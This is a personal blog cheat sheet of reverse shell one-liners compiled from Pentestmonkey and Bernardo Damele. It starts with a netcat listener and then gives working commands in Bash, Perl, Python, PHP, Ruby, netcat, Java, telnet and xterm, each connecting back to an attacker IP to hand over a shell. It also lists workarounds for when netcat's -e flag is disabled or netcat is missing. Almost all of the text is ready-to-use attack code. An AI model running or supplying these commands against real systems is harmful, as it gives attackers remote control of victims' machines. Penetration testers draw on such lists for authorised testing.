There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they’ve got for my notes purposes. (It’s easier for me to find stuff if it’s in one place). All credit goes to both of those guys where I got all this info from.

Step one – Set up your listener.

1
nc -l -v attackerip 4444

In all these examples the attacker IP will be 192.168.0.100

Bash

1
2
exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
1
0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196
1
bash -i >& /dev/tcp/192.168.0.100/4444 0>&1

Perl

1
perl -e 'use socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

For windows based systems you can use

1
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

1
php -r '$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

The following does not need /bin/sh:

1
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

The following is for windows based systems:

1
ruby -rsocket -e 'c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NetCat

1
nc -e /bin/sh 192.168.0.100 4444
1
nc -c /bin/sh 192.168.0.100 4444
1
/bin/sh | nc 192.168.0.100 4444

If the -e flag is disabled you can get around it using the following

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
1
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Java

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet
If netcat is missing (and in most cases you wont have this), then use telnet:

1
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0/tmp/p
1
2
telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445
# also listen on your machine also on port 4445/tcp

Xterm
This one is a little more tricky, you need to start a listener on the attacker box to catch the incoming xterm

1
Xnest :1; xterm -display 127.0.0.1:1

and then inside the spawned xterm session run this:

1
xhost +victimip

Then on the victim you need to run this

1
xterm -display 192.168.0.100:1

Leave a Reply